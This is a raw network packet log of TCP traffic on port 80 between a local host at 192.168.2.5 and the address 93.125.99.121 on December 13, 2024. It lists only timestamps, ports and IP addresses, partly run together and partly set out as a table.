                                              Dec 13, 2024 17:57:35.728431940 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:35.728463888 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:35.728480101 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:35.729547977 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:35.729604006 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:35.729624033 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:35.729665041 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:35.730721951 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:35.730776072 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:35.730823994 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:35.730868101 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:35.731990099 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:35.732043982 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:35.732060909 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:35.732108116 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:35.733144045 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:35.733196020 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:35.733246088 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:35.733289003 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:35.734359026 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:35.734417915 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:35.734488010 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:35.734533072 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:35.735547066 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:35.735599995 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:35.735651970 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:35.735696077 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:35.736756086 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:35.736809015 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:35.867460012 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:35.867559910 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:35.867582083 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:35.867621899 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:35.867921114 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:35.867990971 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:35.868171930 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:35.868242025 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:35.868273973 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:35.868314981 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:35.869359970 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:35.869422913 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:35.869530916 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:35.869580030 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:35.870551109 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:35.870636940 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:35.870707989 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:35.870755911 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:35.871794939 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:35.871834993 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:35.871857882 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:35.871869087 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:35.872908115 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:35.872978926 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:35.873001099 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:35.873066902 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:35.874114990 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:35.874178886 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:35.874228954 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:35.874270916 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:35.875283003 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:35.875328064 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:35.875503063 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:35.875545979 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:35.876462936 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:35.876514912 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:35.876677990 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:35.876720905 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:35.877737045 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:35.877830982 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:35.877859116 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:35.877901077 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:35.878948927 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:35.878983021 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:35.879002094 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:35.879024982 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:35.880053997 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:35.880109072 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:35.880175114 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:35.880218983 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:35.881236076 CET804970493.125.99.121192.168.2.5
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Dec 13, 2024 17:57:35.881293058 CET | 80 | 49704 | 93.125.99.121 | 192.168.2.5
Dec 13, 2024 17:57:35.881294966 CET | 49704 | 80 | 192.168.2.5 | 93.125.99.121
Dec 13, 2024 17:57:35.881330013 CET | 49704 | 80 | 192.168.2.5 | 93.125.99.121
Dec 13, 2024 17:57:35.882468939 CET | 80 | 49704 | 93.125.99.121 | 192.168.2.5
Dec 13, 2024 17:57:35.882546902 CET | 49704 | 80 | 192.168.2.5 | 93.125.99.121
Dec 13, 2024 17:57:35.882570982 CET | 80 | 49704 | 93.125.99.121 | 192.168.2.5
Dec 13, 2024 17:57:35.882612944 CET | 49704 | 80 | 192.168.2.5 | 93.125.99.121
Dec 13, 2024 17:57:35.883855104 CET | 80 | 49704 | 93.125.99.121 | 192.168.2.5
Dec 13, 2024 17:57:35.883923054 CET | 49704 | 80 | 192.168.2.5 | 93.125.99.121
Dec 13, 2024 17:57:35.883955002 CET | 80 | 49704 | 93.125.99.121 | 192.168.2.5
Dec 13, 2024 17:57:35.883995056 CET | 49704 | 80 | 192.168.2.5 | 93.125.99.121
Dec 13, 2024 17:57:35.884887934 CET | 80 | 49704 | 93.125.99.121 | 192.168.2.5
Dec 13, 2024 17:57:35.884947062 CET | 49704 | 80 | 192.168.2.5 | 93.125.99.121
Dec 13, 2024 17:57:35.885040045 CET | 80 | 49704 | 93.125.99.121 | 192.168.2.5
Dec 13, 2024 17:57:35.885082006 CET | 49704 | 80 | 192.168.2.5 | 93.125.99.121
Dec 13, 2024 17:57:35.886234999 CET | 80 | 49704 | 93.125.99.121 | 192.168.2.5
Dec 13, 2024 17:57:35.886275053 CET | 80 | 49704 | 93.125.99.121 | 192.168.2.5
Dec 13, 2024 17:57:35.886285067 CET | 49704 | 80 | 192.168.2.5 | 93.125.99.121
Dec 13, 2024 17:57:35.886312008 CET | 49704 | 80 | 192.168.2.5 | 93.125.99.121
Dec 13, 2024 17:57:35.887444973 CET | 80 | 49704 | 93.125.99.121 | 192.168.2.5
Dec 13, 2024 17:57:35.887491941 CET | 49704 | 80 | 192.168.2.5 | 93.125.99.121
Dec 13, 2024 17:57:35.887523890 CET | 80 | 49704 | 93.125.99.121 | 192.168.2.5
Dec 13, 2024 17:57:35.887562037 CET | 49704 | 80 | 192.168.2.5 | 93.125.99.121
Dec 13, 2024 17:57:35.888349056 CET | 80 | 49704 | 93.125.99.121 | 192.168.2.5
Dec 13, 2024 17:57:35.888410091 CET | 49704 | 80 | 192.168.2.5 | 93.125.99.121
Dec 13, 2024 17:57:35.888458014 CET | 80 | 49704 | 93.125.99.121 | 192.168.2.5
Dec 13, 2024 17:57:35.888498068 CET | 49704 | 80 | 192.168.2.5 | 93.125.99.121
Dec 13, 2024 17:57:35.889554977 CET | 80 | 49704 | 93.125.99.121 | 192.168.2.5
Dec 13, 2024 17:57:35.889600039 CET | 49704 | 80 | 192.168.2.5 | 93.125.99.121
Dec 13, 2024 17:57:35.889621973 CET | 80 | 49704 | 93.125.99.121 | 192.168.2.5
Dec 13, 2024 17:57:35.889662027 CET | 49704 | 80 | 192.168.2.5 | 93.125.99.121
Dec 13, 2024 17:57:35.890824080 CET | 80 | 49704 | 93.125.99.121 | 192.168.2.5
Dec 13, 2024 17:57:35.890866041 CET | 49704 | 80 | 192.168.2.5 | 93.125.99.121
Dec 13, 2024 17:57:35.890889883 CET | 80 | 49704 | 93.125.99.121 | 192.168.2.5
Dec 13, 2024 17:57:35.890928984 CET | 49704 | 80 | 192.168.2.5 | 93.125.99.121
Dec 13, 2024 17:57:35.891927004 CET | 80 | 49704 | 93.125.99.121 | 192.168.2.5
Dec 13, 2024 17:57:35.891973019 CET | 49704 | 80 | 192.168.2.5 | 93.125.99.121
Dec 13, 2024 17:57:35.892028093 CET | 80 | 49704 | 93.125.99.121 | 192.168.2.5
Dec 13, 2024 17:57:35.892070055 CET | 49704 | 80 | 192.168.2.5 | 93.125.99.121
Dec 13, 2024 17:57:35.893099070 CET | 80 | 49704 | 93.125.99.121 | 192.168.2.5
Dec 13, 2024 17:57:35.893141031 CET | 49704 | 80 | 192.168.2.5 | 93.125.99.121
Dec 13, 2024 17:57:35.893191099 CET | 80 | 49704 | 93.125.99.121 | 192.168.2.5
Dec 13, 2024 17:57:35.893224955 CET | 49704 | 80 | 192.168.2.5 | 93.125.99.121
Dec 13, 2024 17:57:35.894323111 CET | 80 | 49704 | 93.125.99.121 | 192.168.2.5
Dec 13, 2024 17:57:35.894366980 CET | 49704 | 80 | 192.168.2.5 | 93.125.99.121
Dec 13, 2024 17:57:35.894403934 CET | 80 | 49704 | 93.125.99.121 | 192.168.2.5
Dec 13, 2024 17:57:35.894437075 CET | 49704 | 80 | 192.168.2.5 | 93.125.99.121
Dec 13, 2024 17:57:35.895596027 CET | 80 | 49704 | 93.125.99.121 | 192.168.2.5
Dec 13, 2024 17:57:35.895634890 CET | 49704 | 80 | 192.168.2.5 | 93.125.99.121
Dec 13, 2024 17:57:35.895711899 CET | 80 | 49704 | 93.125.99.121 | 192.168.2.5
Dec 13, 2024 17:57:35.895745993 CET | 49704 | 80 | 192.168.2.5 | 93.125.99.121
Dec 13, 2024 17:57:35.896987915 CET | 80 | 49704 | 93.125.99.121 | 192.168.2.5
Dec 13, 2024 17:57:35.897032976 CET | 49704 | 80 | 192.168.2.5 | 93.125.99.121
Dec 13, 2024 17:57:35.897139072 CET | 80 | 49704 | 93.125.99.121 | 192.168.2.5
Dec 13, 2024 17:57:35.897172928 CET | 49704 | 80 | 192.168.2.5 | 93.125.99.121
Dec 13, 2024 17:57:35.898205042 CET | 80 | 49704 | 93.125.99.121 | 192.168.2.5
Dec 13, 2024 17:57:35.898245096 CET | 49704 | 80 | 192.168.2.5 | 93.125.99.121
Dec 13, 2024 17:57:35.898299932 CET | 80 | 49704 | 93.125.99.121 | 192.168.2.5
Dec 13, 2024 17:57:35.898338079 CET | 49704 | 80 | 192.168.2.5 | 93.125.99.121
Dec 13, 2024 17:57:35.899348021 CET | 80 | 49704 | 93.125.99.121 | 192.168.2.5
Dec 13, 2024 17:57:35.899396896 CET | 49704 | 80 | 192.168.2.5 | 93.125.99.121
Dec 13, 2024 17:57:35.899488926 CET | 80 | 49704 | 93.125.99.121 | 192.168.2.5
Dec 13, 2024 17:57:35.899525881 CET | 49704 | 80 | 192.168.2.5 | 93.125.99.121
Dec 13, 2024 17:57:35.900530100 CET | 80 | 49704 | 93.125.99.121 | 192.168.2.5
Dec 13, 2024 17:57:35.900574923 CET | 49704 | 80 | 192.168.2.5 | 93.125.99.121
Dec 13, 2024 17:57:35.900671959 CET | 80 | 49704 | 93.125.99.121 | 192.168.2.5
Dec 13, 2024 17:57:35.900711060 CET | 49704 | 80 | 192.168.2.5 | 93.125.99.121
Dec 13, 2024 17:57:35.901663065 CET | 80 | 49704 | 93.125.99.121 | 192.168.2.5
Dec 13, 2024 17:57:35.901684046 CET | 80 | 49704 | 93.125.99.121 | 192.168.2.5
Dec 13, 2024 17:57:35.901705027 CET | 49704 | 80 | 192.168.2.5 | 93.125.99.121
Dec 13, 2024 17:57:35.901736021 CET | 49704 | 80 | 192.168.2.5 | 93.125.99.121
Dec 13, 2024 17:57:35.902777910 CET | 80 | 49704 | 93.125.99.121 | 192.168.2.5
Dec 13, 2024 17:57:35.902818918 CET | 49704 | 80 | 192.168.2.5 | 93.125.99.121
Dec 13, 2024 17:57:35.902848959 CET | 80 | 49704 | 93.125.99.121 | 192.168.2.5
Dec 13, 2024 17:57:35.902880907 CET | 49704 | 80 | 192.168.2.5 | 93.125.99.121
Dec 13, 2024 17:57:35.903758049 CET | 80 | 49704 | 93.125.99.121 | 192.168.2.5
Dec 13, 2024 17:57:35.903800964 CET | 49704 | 80 | 192.168.2.5 | 93.125.99.121
Dec 13, 2024 17:57:35.903925896 CET | 80 | 49704 | 93.125.99.121 | 192.168.2.5
Dec 13, 2024 17:57:35.903963089 CET | 49704 | 80 | 192.168.2.5 | 93.125.99.121
Dec 13, 2024 17:57:35.904956102 CET | 80 | 49704 | 93.125.99.121 | 192.168.2.5
Dec 13, 2024 17:57:35.905000925 CET | 49704 | 80 | 192.168.2.5 | 93.125.99.121
Dec 13, 2024 17:57:35.905047894 CET | 80 | 49704 | 93.125.99.121 | 192.168.2.5
Dec 13, 2024 17:57:35.905086040 CET | 49704 | 80 | 192.168.2.5 | 93.125.99.121
Dec 13, 2024 17:57:35.906161070 CET | 80 | 49704 | 93.125.99.121 | 192.168.2.5
Dec 13, 2024 17:57:35.906204939 CET | 49704 | 80 | 192.168.2.5 | 93.125.99.121
Dec 13, 2024 17:57:35.906253099 CET | 80 | 49704 | 93.125.99.121 | 192.168.2.5
Dec 13, 2024 17:57:35.906287909 CET | 49704 | 80 | 192.168.2.5 | 93.125.99.121
Dec 13, 2024 17:57:35.907371998 CET | 80 | 49704 | 93.125.99.121 | 192.168.2.5
Dec 13, 2024 17:57:35.907413960 CET | 49704 | 80 | 192.168.2.5 | 93.125.99.121
Dec 13, 2024 17:57:35.907562017 CET | 80 | 49704 | 93.125.99.121 | 192.168.2.5
Dec 13, 2024 17:57:35.907603025 CET | 49704 | 80 | 192.168.2.5 | 93.125.99.121
Dec 13, 2024 17:57:35.908469915 CET | 80 | 49704 | 93.125.99.121 | 192.168.2.5
Dec 13, 2024 17:57:35.908510923 CET | 49704 | 80 | 192.168.2.5 | 93.125.99.121
Dec 13, 2024 17:57:35.908518076 CET | 80 | 49704 | 93.125.99.121 | 192.168.2.5
Dec 13, 2024 17:57:35.908551931 CET | 49704 | 80 | 192.168.2.5 | 93.125.99.121
Dec 13, 2024 17:57:35.909662008 CET | 80 | 49704 | 93.125.99.121 | 192.168.2.5
Dec 13, 2024 17:57:35.909709930 CET | 49704 | 80 | 192.168.2.5 | 93.125.99.121
Dec 13, 2024 17:57:35.909758091 CET | 80 | 49704 | 93.125.99.121 | 192.168.2.5
Dec 13, 2024 17:57:35.909796000 CET | 49704 | 80 | 192.168.2.5 | 93.125.99.121
Dec 13, 2024 17:57:35.910871983 CET | 80 | 49704 | 93.125.99.121 | 192.168.2.5
Dec 13, 2024 17:57:35.910914898 CET | 49704 | 80 | 192.168.2.5 | 93.125.99.121
Dec 13, 2024 17:57:35.910969019 CET | 80 | 49704 | 93.125.99.121 | 192.168.2.5
Dec 13, 2024 17:57:35.911005974 CET | 49704 | 80 | 192.168.2.5 | 93.125.99.121
Dec 13, 2024 17:57:35.912045002 CET | 80 | 49704 | 93.125.99.121 | 192.168.2.5
Dec 13, 2024 17:57:35.912097931 CET | 49704 | 80 | 192.168.2.5 | 93.125.99.121
Dec 13, 2024 17:57:35.912151098 CET | 80 | 49704 | 93.125.99.121 | 192.168.2.5
Dec 13, 2024 17:57:35.912185907 CET | 49704 | 80 | 192.168.2.5 | 93.125.99.121
Dec 13, 2024 17:57:35.913242102 CET | 80 | 49704 | 93.125.99.121 | 192.168.2.5
Dec 13, 2024 17:57:35.913280964 CET | 80 | 49704 | 93.125.99.121 | 192.168.2.5
Dec 13, 2024 17:57:35.913310051 CET | 49704 | 80 | 192.168.2.5 | 93.125.99.121
Dec 13, 2024 17:57:35.913331985 CET | 49704 | 80 | 192.168.2.5 | 93.125.99.121
Dec 13, 2024 17:57:35.914387941 CET | 80 | 49704 | 93.125.99.121 | 192.168.2.5
Dec 13, 2024 17:57:35.914427996 CET | 49704 | 80 | 192.168.2.5 | 93.125.99.121
Dec 13, 2024 17:57:35.914510965 CET | 80 | 49704 | 93.125.99.121 | 192.168.2.5
Dec 13, 2024 17:57:35.914555073 CET | 49704 | 80 | 192.168.2.5 | 93.125.99.121
Dec 13, 2024 17:57:35.915616989 CET | 80 | 49704 | 93.125.99.121 | 192.168.2.5
Dec 13, 2024 17:57:35.915662050 CET | 49704 | 80 | 192.168.2.5 | 93.125.99.121
Dec 13, 2024 17:57:35.915676117 CET | 80 | 49704 | 93.125.99.121 | 192.168.2.5
Dec 13, 2024 17:57:35.915713072 CET | 49704 | 80 | 192.168.2.5 | 93.125.99.121
Dec 13, 2024 17:57:35.916837931 CET | 80 | 49704 | 93.125.99.121 | 192.168.2.5
Dec 13, 2024 17:57:35.916881084 CET | 49704 | 80 | 192.168.2.5 | 93.125.99.121
Dec 13, 2024 17:57:35.916987896 CET | 80 | 49704 | 93.125.99.121 | 192.168.2.5
Dec 13, 2024 17:57:35.917023897 CET | 49704 | 80 | 192.168.2.5 | 93.125.99.121
Dec 13, 2024 17:57:35.918020964 CET | 80 | 49704 | 93.125.99.121 | 192.168.2.5
Dec 13, 2024 17:57:35.918061972 CET | 49704 | 80 | 192.168.2.5 | 93.125.99.121
Dec 13, 2024 17:57:35.918066025 CET | 80 | 49704 | 93.125.99.121 | 192.168.2.5
Dec 13, 2024 17:57:35.918101072 CET | 49704 | 80 | 192.168.2.5 | 93.125.99.121
Dec 13, 2024 17:57:35.919294119 CET | 80 | 49704 | 93.125.99.121 | 192.168.2.5
Dec 13, 2024 17:57:35.919336081 CET | 49704 | 80 | 192.168.2.5 | 93.125.99.121
Dec 13, 2024 17:57:35.919385910 CET | 80 | 49704 | 93.125.99.121 | 192.168.2.5
Dec 13, 2024 17:57:35.919437885 CET | 49704 | 80 | 192.168.2.5 | 93.125.99.121
Dec 13, 2024 17:57:35.920494080 CET | 80 | 49704 | 93.125.99.121 | 192.168.2.5
Dec 13, 2024 17:57:35.920537949 CET | 49704 | 80 | 192.168.2.5 | 93.125.99.121
Dec 13, 2024 17:57:35.920613050 CET | 80 | 49704 | 93.125.99.121 | 192.168.2.5
Dec 13, 2024 17:57:35.920649052 CET | 49704 | 80 | 192.168.2.5 | 93.125.99.121
Dec 13, 2024 17:57:35.922449112 CET | 80 | 49704 | 93.125.99.121 | 192.168.2.5
Dec 13, 2024 17:57:35.922461033 CET | 80 | 49704 | 93.125.99.121 | 192.168.2.5
Dec 13, 2024 17:57:35.922489882 CET | 49704 | 80 | 192.168.2.5 | 93.125.99.121
Dec 13, 2024 17:57:35.922528982 CET | 49704 | 80 | 192.168.2.5 | 93.125.99.121
Dec 13, 2024 17:57:35.922785044 CET | 80 | 49704 | 93.125.99.121 | 192.168.2.5
Dec 13, 2024 17:57:35.922827959 CET | 49704 | 80 | 192.168.2.5 | 93.125.99.121
Dec 13, 2024 17:57:35.922868013 CET | 80 | 49704 | 93.125.99.121 | 192.168.2.5
Dec 13, 2024 17:57:35.922903061 CET | 49704 | 80 | 192.168.2.5 | 93.125.99.121
Dec 13, 2024 17:57:35.923944950 CET | 80 | 49704 | 93.125.99.121 | 192.168.2.5
Dec 13, 2024 17:57:35.923995972 CET | 49704 | 80 | 192.168.2.5 | 93.125.99.121
Dec 13, 2024 17:57:35.924053907 CET | 80 | 49704 | 93.125.99.121 | 192.168.2.5
Dec 13, 2024 17:57:35.924091101 CET | 49704 | 80 | 192.168.2.5 | 93.125.99.121
Dec 13, 2024 17:57:35.925127983 CET | 80 | 49704 | 93.125.99.121 | 192.168.2.5
Dec 13, 2024 17:57:35.925173044 CET | 49704 | 80 | 192.168.2.5 | 93.125.99.121
Dec 13, 2024 17:57:35.925261974 CET | 80 | 49704 | 93.125.99.121 | 192.168.2.5
Dec 13, 2024 17:57:35.925302029 CET | 49704 | 80 | 192.168.2.5 | 93.125.99.121
Dec 13, 2024 17:57:35.926325083 CET | 80 | 49704 | 93.125.99.121 | 192.168.2.5
Dec 13, 2024 17:57:35.926363945 CET | 80 | 49704 | 93.125.99.121 | 192.168.2.5
Dec 13, 2024 17:57:35.926364899 CET | 49704 | 80 | 192.168.2.5 | 93.125.99.121
Dec 13, 2024 17:57:35.926398039 CET | 49704 | 80 | 192.168.2.5 | 93.125.99.121
Dec 13, 2024 17:57:35.927462101 CET | 80 | 49704 | 93.125.99.121 | 192.168.2.5
Dec 13, 2024 17:57:35.927501917 CET | 49704 | 80 | 192.168.2.5 | 93.125.99.121
Dec 13, 2024 17:57:35.927588940 CET | 80 | 49704 | 93.125.99.121 | 192.168.2.5
Dec 13, 2024 17:57:35.927624941 CET | 49704 | 80 | 192.168.2.5 | 93.125.99.121
Dec 13, 2024 17:57:35.928642988 CET | 80 | 49704 | 93.125.99.121 | 192.168.2.5
Dec 13, 2024 17:57:35.928685904 CET | 49704 | 80 | 192.168.2.5 | 93.125.99.121
Dec 13, 2024 17:57:35.928774118 CET | 80 | 49704 | 93.125.99.121 | 192.168.2.5
Dec 13, 2024 17:57:35.928807020 CET | 49704 | 80 | 192.168.2.5 | 93.125.99.121
Dec 13, 2024 17:57:36.060208082 CET | 80 | 49704 | 93.125.99.121 | 192.168.2.5
Dec 13, 2024 17:57:36.060224056 CET | 80 | 49704 | 93.125.99.121 | 192.168.2.5
Dec 13, 2024 17:57:36.060267925 CET | 49704 | 80 | 192.168.2.5 | 93.125.99.121
Dec 13, 2024 17:57:36.060317993 CET | 49704 | 80 | 192.168.2.5 | 93.125.99.121
Dec 13, 2024 17:57:36.060528040 CET | 80 | 49704 | 93.125.99.121 | 192.168.2.5
Dec 13, 2024 17:57:36.060561895 CET | 49704 | 80 | 192.168.2.5 | 93.125.99.121
Dec 13, 2024 17:57:36.060695887 CET | 80 | 49704 | 93.125.99.121 | 192.168.2.5
Dec 13, 2024 17:57:36.060734034 CET | 49704 | 80 | 192.168.2.5 | 93.125.99.121
Dec 13, 2024 17:57:36.061054945 CET | 80 | 49704 | 93.125.99.121 | 192.168.2.5
Dec 13, 2024 17:57:36.061095953 CET | 49704 | 80 | 192.168.2.5 | 93.125.99.121
Dec 13, 2024 17:57:36.061198950 CET | 80 | 49704 | 93.125.99.121 | 192.168.2.5
Dec 13, 2024 17:57:36.061232090 CET | 49704 | 80 | 192.168.2.5 | 93.125.99.121
Dec 13, 2024 17:57:36.061994076 CET | 80 | 49704 | 93.125.99.121 | 192.168.2.5
Dec 13, 2024 17:57:36.062006950 CET | 80 | 49704 | 93.125.99.121 | 192.168.2.5
Dec 13, 2024 17:57:36.062038898 CET | 49704 | 80 | 192.168.2.5 | 93.125.99.121
Dec 13, 2024 17:57:36.062068939 CET | 49704 | 80 | 192.168.2.5 | 93.125.99.121
Dec 13, 2024 17:57:36.062737942 CET | 80 | 49704 | 93.125.99.121 | 192.168.2.5
Dec 13, 2024 17:57:36.062777042 CET | 49704 | 80 | 192.168.2.5 | 93.125.99.121
Dec 13, 2024 17:57:36.062817097 CET | 80 | 49704 | 93.125.99.121 | 192.168.2.5
Dec 13, 2024 17:57:36.062855959 CET | 49704 | 80 | 192.168.2.5 | 93.125.99.121
Dec 13, 2024 17:57:36.063929081 CET | 80 | 49704 | 93.125.99.121 | 192.168.2.5
Dec 13, 2024 17:57:36.063970089 CET | 49704 | 80 | 192.168.2.5 | 93.125.99.121
Dec 13, 2024 17:57:36.064069033 CET | 80 | 49704 | 93.125.99.121 | 192.168.2.5
Dec 13, 2024 17:57:36.064105034 CET | 49704 | 80 | 192.168.2.5 | 93.125.99.121
Dec 13, 2024 17:57:36.065098047 CET | 80 | 49704 | 93.125.99.121 | 192.168.2.5
Dec 13, 2024 17:57:36.065145969 CET | 49704 | 80 | 192.168.2.5 | 93.125.99.121
Dec 13, 2024 17:57:36.065192938 CET | 80 | 49704 | 93.125.99.121 | 192.168.2.5
Dec 13, 2024 17:57:36.065241098 CET | 49704 | 80 | 192.168.2.5 | 93.125.99.121
Dec 13, 2024 17:57:36.066287994 CET | 80 | 49704 | 93.125.99.121 | 192.168.2.5
Dec 13, 2024 17:57:36.066329956 CET | 49704 | 80 | 192.168.2.5 | 93.125.99.121
Dec 13, 2024 17:57:36.066423893 CET | 80 | 49704 | 93.125.99.121 | 192.168.2.5
Dec 13, 2024 17:57:36.066462040 CET | 49704 | 80 | 192.168.2.5 | 93.125.99.121
Dec 13, 2024 17:57:36.067488909 CET | 80 | 49704 | 93.125.99.121 | 192.168.2.5
Dec 13, 2024 17:57:36.067509890 CET | 80 | 49704 | 93.125.99.121 | 192.168.2.5
Dec 13, 2024 17:57:36.067534924 CET | 49704 | 80 | 192.168.2.5 | 93.125.99.121
Dec 13, 2024 17:57:36.067565918 CET | 49704 | 80 | 192.168.2.5 | 93.125.99.121
Dec 13, 2024 17:57:36.068629026 CET | 80 | 49704 | 93.125.99.121 | 192.168.2.5
Dec 13, 2024 17:57:36.068674088 CET | 49704 | 80 | 192.168.2.5 | 93.125.99.121
Dec 13, 2024 17:57:36.068680048 CET | 80 | 49704 | 93.125.99.121 | 192.168.2.5
Dec 13, 2024 17:57:36.068715096 CET | 49704 | 80 | 192.168.2.5 | 93.125.99.121
Dec 13, 2024 17:57:36.069837093 CET | 80 | 49704 | 93.125.99.121 | 192.168.2.5
Dec 13, 2024 17:57:36.069881916 CET | 49704 | 80 | 192.168.2.5 | 93.125.99.121
Dec 13, 2024 17:57:36.070087910 CET | 80 | 49704 | 93.125.99.121 | 192.168.2.5
Dec 13, 2024 17:57:36.070132017 CET | 49704 | 80 | 192.168.2.5 | 93.125.99.121
Dec 13, 2024 17:57:36.071048975 CET | 80 | 49704 | 93.125.99.121 | 192.168.2.5
Dec 13, 2024 17:57:36.071084023 CET | 80 | 49704 | 93.125.99.121 | 192.168.2.5
Dec 13, 2024 17:57:36.071099043 CET | 49704 | 80 | 192.168.2.5 | 93.125.99.121
Dec 13, 2024 17:57:36.071130037 CET | 49704 | 80 | 192.168.2.5 | 93.125.99.121
Dec 13, 2024 17:57:36.072243929 CET | 80 | 49704 | 93.125.99.121 | 192.168.2.5
Dec 13, 2024 17:57:36.072300911 CET | 49704 | 80 | 192.168.2.5 | 93.125.99.121
Dec 13, 2024 17:57:36.072382927 CET | 80 | 49704 | 93.125.99.121 | 192.168.2.5
Dec 13, 2024 17:57:36.072422981 CET | 49704 | 80 | 192.168.2.5 | 93.125.99.121
Dec 13, 2024 17:57:36.073427916 CET | 80 | 49704 | 93.125.99.121 | 192.168.2.5
Dec 13, 2024 17:57:36.073472023 CET | 49704 | 80 | 192.168.2.5 | 93.125.99.121
Dec 13, 2024 17:57:36.073616028 CET | 80 | 49704 | 93.125.99.121 | 192.168.2.5
Dec 13, 2024 17:57:36.073663950 CET | 49704 | 80 | 192.168.2.5 | 93.125.99.121
Dec 13, 2024 17:57:36.074681997 CET | 80 | 49704 | 93.125.99.121 | 192.168.2.5
Dec 13, 2024 17:57:36.074733973 CET | 49704 | 80 | 192.168.2.5 | 93.125.99.121
Dec 13, 2024 17:57:36.074774981 CET | 80 | 49704 | 93.125.99.121 | 192.168.2.5
Dec 13, 2024 17:57:36.074815989 CET | 49704 | 80 | 192.168.2.5 | 93.125.99.121
Dec 13, 2024 17:57:36.075844049 CET | 80 | 49704 | 93.125.99.121 | 192.168.2.5
Dec 13, 2024 17:57:36.075895071 CET | 49704 | 80 | 192.168.2.5 | 93.125.99.121
Dec 13, 2024 17:57:36.076047897 CET | 80 | 49704 | 93.125.99.121 | 192.168.2.5
Dec 13, 2024 17:57:36.076092005 CET | 49704 | 80 | 192.168.2.5 | 93.125.99.121
